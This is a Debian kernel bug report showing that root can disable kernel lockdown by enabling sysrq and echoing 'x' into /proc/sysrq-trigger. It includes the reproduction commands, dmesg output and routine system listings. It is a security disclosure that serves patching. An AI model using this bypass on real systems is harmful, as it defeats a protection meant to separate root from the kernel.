Bug#947021: linux-image-4.19.0-6-amd64: root can lift kernel lockdown
Package: src:linux
Version: 4.19.67-2+deb10u2
Severity: normal
Dear Maintainer,
echoing "x" into /proc/sysrq-trigger disables kernel lockdown, even though it shouldn't.
Kernel lockdown is meant to create a barrier between root and the kernel that can only be broken with physical access to the system.
But a bug in debian/patches/features/all/lockdown/0002-Add-a-SysRq-option-to-lift-kernel-lockdown.patch allows root to easily circumvent this security measure:
vagrant@buster:~$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.19.0-6-amd64 root=UUID=b9ffc3d1-86b2-4a2c-a8be-f2b2f4aa4cb5 ro net.ifnames=0 quiet lockdown
vagrant@buster:~$ sudo dmesg | grep locked
[ 0.000000] Kernel is locked down from command line; see https://wiki.debian.org/SecureBoot
vagrant@buster:~$ sudo sysctl kernel.sysrq=1
kernel.sysrq = 1
vagrant@buster:~$ sudo sh -c "echo x > /proc/sysrq-trigger"
vagrant@buster:~$ sudo dmesg | tail
[ 3.050592] vboxvideo 0000:00:02.0: fb0: vboxdrmfb frame buffer device
[ 3.068268] [drm] Initialized vboxvideo 1.0.0 20130823 for 0000:00:02.0 on minor 0
[ 3.183323] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 3.223529] Adding 1045500k swap on /dev/sda5. Priority:-2 extents:1 across:1045500k FS
[ 5.200670] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
[ 5.201533] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 42.660726] sysrq: SysRq :
[ 42.660728] This sysrq operation is disabled from userspace.
[ 42.660797] Disabling Secure Boot restrictions
[ 42.660830] Lifting lockdown
I already reported this bug to Ubuntu at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1851380
but it also affects Debian. (There's a bit more context and a patch in that bug report.)
Looking at the patch on salsa I think that this bug doesn't just exist in Buster, but that's the version I used to test it.
Best regards,
Niklas Sombert
-- Package-specific info:
** Version:
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11)
** Command line:
BOOT_IMAGE=/boot/vmlinuz-4.19.0-6-amd64 root=UUID=b9ffc3d1-86b2-4a2c-a8be-f2b2f4aa4cb5 ro net.ifnames=0 quiet lockdown
** Tainted: C (1024)
* Module from drivers/staging has been loaded.
** Kernel log:
[ 1.080252] Loading compiled-in X.509 certificates
[ 1.123039] Loaded X.509 cert 'Debian Secure Boot CA: 6ccece7e4c6c0d1f6149f3dd27dfcc5cbb419ea1'
[ 1.123062] Loaded X.509 cert 'Debian Secure Boot Signer: 00a7468def'
[ 1.123095] zswap: loaded using pool lzo/zbud
[ 1.123659] AppArmor: AppArmor sha1 policy hashing enabled
[ 1.124095] rtc_cmos rtc_cmos: setting system clock to 2019-12-19 14:23:08 UTC (1576765388)
[ 1.124123] Lockdown: Hibernation is restricted; see https://wiki.debian.org/SecureBoot
[ 1.125951] Freeing unused kernel image memory: 1584K
[ 1.148274] Write protecting the kernel read-only data: 16384k
[ 1.150291] Freeing unused kernel image memory: 2028K
[ 1.150967] Freeing unused kernel image memory: 772K
[ 1.165327] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[ 1.165329] x86/mm: Checking user space page tables
[ 1.173508] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[ 1.173511] Run /init as init process
[ 1.274579] piix4_smbus 0000:00:07.0: SMBus Host Controller at 0x4100, revision 0
[ 1.280038] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI
[ 1.280040] e1000: Copyright (c) 1999-2006 Intel Corporation.
[ 1.288044] SCSI subsystem initialized
[ 1.297356] FDC 0 is an 82078.
[ 1.306225] cryptd: max_cpu_qlen set to 1000
[ 1.317316] libata version 3.00 loaded.
[ 1.323785] ahci 0000:00:0d.0: version 3.0
[ 1.324687] ahci 0000:00:0d.0: SSS flag set, parallel bus scan disabled
[ 1.324882] ahci 0000:00:0d.0: AHCI 0001.0100 32 slots 1 ports 3 Gbps 0x1 impl SATA mode
[ 1.324884] ahci 0000:00:0d.0: flags: 64bit ncq stag only ccc
[ 1.325243] scsi host0: ahci
[ 1.325387] ata1: SATA max UDMA/133 abar m8192@0xf0804000 port 0xf0804100 irq 21
[ 1.336127] AVX2 version of gcm_enc/dec engaged.
[ 1.336128] AES CTR mode by8 optimization enabled
[ 1.553903] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input2
[ 1.647971] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[ 1.648249] ata1.00: ATA-6: VBOX HARDDISK, 1.0, max UDMA/133
[ 1.648253] ata1.00: 41533440 sectors, multi 128: LBA48 NCQ (depth 32)
[ 1.649141] ata1.00: configured for UDMA/133
[ 1.652372] scsi 0:0:0:0: Direct-Access ATA VBOX HARDDISK 1.0 PQ: 0 ANSI: 5
[ 1.661577] sd 0:0:0:0: [sda] 41533440 512-byte logical blocks: (21.3 GB/19.8 GiB)
[ 1.661585] sd 0:0:0:0: [sda] Write Protect is off
[ 1.661587] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00
[ 1.661596] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 1.662652] sda: sda1 sda2 < sda5 >
[ 1.662960] sd 0:0:0:0: [sda] Attached SCSI disk
[ 1.726642] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 08:00:27:8d:c0:4d
[ 1.726649] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection
[ 1.925326] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null)
[ 2.173566] systemd[1]: Inserted module 'autofs4'
[ 2.192803] systemd[1]: systemd 241 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)
[ 2.192854] systemd[1]: Detected virtualization oracle.
[ 2.192860] systemd[1]: Detected architecture x86-64.
[ 2.203626] systemd[1]: Set hostname to <buster>.
[ 2.204816] systemd[1]: Failed to bump fs.file-max, ignoring: Invalid argument
[ 2.208030] Lockdown: BPF is restricted; see https://wiki.debian.org/SecureBoot
[ 2.276511] systemd[1]: File /lib/systemd/system/systemd-journald.service:12 configures an IP firewall (IPAddressDeny=any), but the local system does not support BPF/cgroup based firewalling.
[ 2.276515] systemd[1]: Proceeding WITHOUT firewalling in effect! (This warning is only shown for the first loaded unit using IP firewalling.)
[ 2.341968] systemd[1]: Listening on udev Control Socket.
[ 2.350693] systemd[1]: Created slice system-getty.slice.
[ 2.350718] systemd[1]: Reached target Remote File Systems.
[ 2.437728] EXT4-fs (sda1): re-mounted. Opts: errors=remount-ro
[ 2.561461] systemd-journald[211]: Received request to flush runtime journal from PID 1
[ 2.716029] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input3
[ 2.717863] ACPI: Power Button [PWRF]
[ 2.718080] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input4
[ 2.718097] ACPI: Sleep Button [SLPF]
[ 2.730497] ACPI: AC Adapter [AC] (on-line)
[ 2.750810] battery: ACPI: Battery Slot [BAT0] (battery present)
[ 2.773327] ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no)
[ 2.773420] input: Video Bus as /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/LNXVIDEO:00/input/input5
[ 2.779831] vboxguest: host-version: 5.2.34r133883 0x1
[ 2.781683] vbg_heartbeat_init: Setting up heartbeat to trigger every 2000 milliseconds
[ 2.781868] input: VirtualBox mouse integration as /devices/pci0000:00/0000:00:04.0/input/input6
[ 2.798688] vboxguest: misc device minor 58, IRQ 20, I/O port d020, MMIO at 0x00000000f0400000 (size 0x0000000000400000)
[ 2.817525] input: PC Speaker as /devices/platform/pcspkr/input/input7
[ 2.841065] sd 0:0:0:0: Attached scsi generic sg0 type 0
[ 2.869452] RAPL PMU: API unit is 2^-32 Joules, 4 fixed counters, 10737418240 ms ovfl timer
[ 2.869454] RAPL PMU: hw unit of domain pp0-core 2^-0 Joules
[ 2.869455] RAPL PMU: hw unit of domain package 2^-0 Joules
[ 2.869456] RAPL PMU: hw unit of domain dram 2^-0 Joules
[ 2.869456] RAPL PMU: hw unit of domain pp1-gpu 2^-0 Joules
[ 2.961287] audit: type=1400 audit(1576765390.336:2): apparmor="STATUS" operation="profile_load" profile="unconfined" name="nvidia_modprobe" pid=268 comm="apparmor_parser"
[ 2.961291] audit: type=1400 audit(1576765390.336:3): apparmor="STATUS" operation="profile_load" profile="unconfined" name="nvidia_modprobe//kmod" pid=268 comm="apparmor_parser"
[ 2.961650] audit: type=1400 audit(1576765390.336:4): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/bin/man" pid=267 comm="apparmor_parser"
[ 2.961652] audit: type=1400 audit(1576765390.336:5): apparmor="STATUS" operation="profile_load" profile="unconfined" name="man_filter" pid=267 comm="apparmor_parser"
[ 2.961654] audit: type=1400 audit(1576765390.336:6): apparmor="STATUS" operation="profile_load" profile="unconfined" name="man_groff" pid=267 comm="apparmor_parser"
[ 3.030128] vboxvideo: module is from the staging directory, the quality is unknown, you have been warned.
[ 3.036508] [drm] VRAM 00800000
[ 3.036740] [TTM] Zone kernel: Available graphics memory: 247382 kiB
[ 3.036741] [TTM] Initializing pool allocator
[ 3.036745] [TTM] Initializing DMA pool allocator
[ 3.039735] fbcon: vboxdrmfb (fb0) is primary device
[ 3.048398] Console: switching to colour frame buffer device 100x37
[ 3.050592] vboxvideo 0000:00:02.0: fb0: vboxdrmfb frame buffer device
[ 3.068268] [drm] Initialized vboxvideo 1.0.0 20130823 for 0000:00:02.0 on minor 0
[ 3.183323] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 3.223529] Adding 1045500k swap on /dev/sda5. Priority:-2 extents:1 across:1045500k FS
[ 5.200670] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: RX
[ 5.201533] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 42.660726] sysrq: SysRq :
[ 42.660728] This sysrq operation is disabled from userspace.
[ 42.660797] Disabling Secure Boot restrictions
[ 42.660830] Lifting lockdown
** Model information
sys_vendor: innotek GmbH
product_name: VirtualBox
product_version: 1.2
chassis_vendor: Oracle Corporation
chassis_version:
bios_vendor: innotek GmbH
bios_version: VirtualBox
board_vendor: Oracle Corporation
board_name: VirtualBox
board_version: 1.2
** Loaded modules:
crct10dif_pclmul
crc32_pclmul
vboxvideo(C)
ttm
joydev
drm_kms_helper
ghash_clmulni_intel
intel_rapl_perf
drm
evdev
sg
serio_raw
pcspkr
vboxguest
battery
ac
video
button
ip_tables
x_tables
autofs4
ext4
crc16
mbcache
jbd2
crc32c_generic
fscrypto
ecb
sd_mod
crc32c_intel
psmouse
aesni_intel
ahci
libahci
libata
aes_x86_64
crypto_simd
cryptd
glue_helper
scsi_mod
e1000
i2c_piix4
floppy
** PCI devices:
00:00.0 Host bridge [0600]: Intel Corporation 440FX - 82441FX PMC [Natoma] [8086:1237] (rev 02)
Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
00:01.0 ISA bridge [0601]: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II] [8086:7000]
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 0
00:02.0 VGA compatible controller [0300]: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter [80ee:beef] (prog-if 00 [VGA controller])
Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Interrupt: pin A routed to IRQ 18
Region 0: Memory at e0000000 (32-bit, prefetchable) [size=8M]
[virtual] Expansion ROM at 000c0000 [disabled] [size=128K]
Kernel driver in use: vboxvideo
Kernel modules: vboxvideo
00:03.0 Ethernet controller [0200]: Intel Corporation 82540EM Gigabit Ethernet Controller [8086:100e] (rev 02)
Subsystem: Intel Corporation PRO/1000 MT Desktop Adapter [8086:001e]
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 64 (63750ns min)
Interrupt: pin A routed to IRQ 19
Region 0: Memory at f0000000 (32-bit, non-prefetchable) [size=128K]
Region 2: I/O ports at d000 [size=8]
Capabilities: <access denied>
Kernel driver in use: e1000
Kernel modules: e1000
00:04.0 System peripheral [0880]: InnoTek Systemberatung GmbH VirtualBox Guest Service [80ee:cafe]
Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Interrupt: pin A routed to IRQ 20
Region 0: I/O ports at d020 [size=32]
Region 1: Memory at f0400000 (32-bit, non-prefetchable) [size=4M]
Region 2: Memory at f0800000 (32-bit, prefetchable) [size=16K]
Kernel driver in use: vboxguest
Kernel modules: vboxguest
00:07.0 Bridge [0680]: Intel Corporation 82371AB/EB/MB PIIX4 ACPI [8086:7113] (rev 08)
Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Interrupt: pin A routed to IRQ 9
Kernel driver in use: piix4_smbus
Kernel modules: i2c_piix4
00:0d.0 SATA controller [0106]: Intel Corporation 82801HM/HEM (ICH8M/ICH8M-E) SATA Controller [AHCI mode] [8086:2829] (rev 02) (prog-if 01 [AHCI 1.0])
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 64
Interrupt: pin A routed to IRQ 21
Region 0: I/O ports at d040 [size=8]
Region 1: I/O ports at d048 [size=4]
Region 2: I/O ports at d050 [size=8]
Region 3: I/O ports at d058 [size=4]
Region 4: I/O ports at d060 [size=16]
Region 5: Memory at f0804000 (32-bit, non-prefetchable) [size=8K]
Capabilities: <access denied>
Kernel driver in use: ahci
Kernel modules: ahci
** USB devices:
not available
-- System Information:
Debian Release: 10.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-6-amd64 (SMP w/2 CPU cores)
Kernel taint flags: TAINT_CRAP
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages linux-image-4.19.0-6-amd64 depends on:
ii initramfs-tools [linux-initramfs-tool] 0.133+deb10u1
ii kmod 26-1
ii linux-base 4.6
Versions of packages linux-image-4.19.0-6-amd64 recommends:
ii apparmor 2.13.2-10
ii firmware-linux-free 3.4
Versions of packages linux-image-4.19.0-6-amd64 suggests:
pn debian-kernel-handbook <none>
ii grub-pc 2.02+dfsg1-20
pn linux-doc-4.19 <none>
Versions of packages linux-image-4.19.0-6-amd64 is related to:
pn firmware-amd-graphics <none>
pn firmware-atheros <none>
pn firmware-bnx2 <none>
pn firmware-bnx2x <none>
pn firmware-brcm80211 <none>
pn firmware-cavium <none>
pn firmware-intel-sound <none>
pn firmware-intelwimax <none>
pn firmware-ipw2x00 <none>
pn firmware-ivtv <none>
pn firmware-iwlwifi <none>
pn firmware-libertas <none>
pn firmware-linux-nonfree <none>
pn firmware-misc-nonfree <none>
pn firmware-myricom <none>
pn firmware-netxen <none>
pn firmware-qlogic <none>
pn firmware-realtek <none>
pn firmware-samsung <none>
pn firmware-siano <none>
pn firmware-ti-connectivity <none>
pn xen-hypervisor <none>
-- no debconf information
Reply to: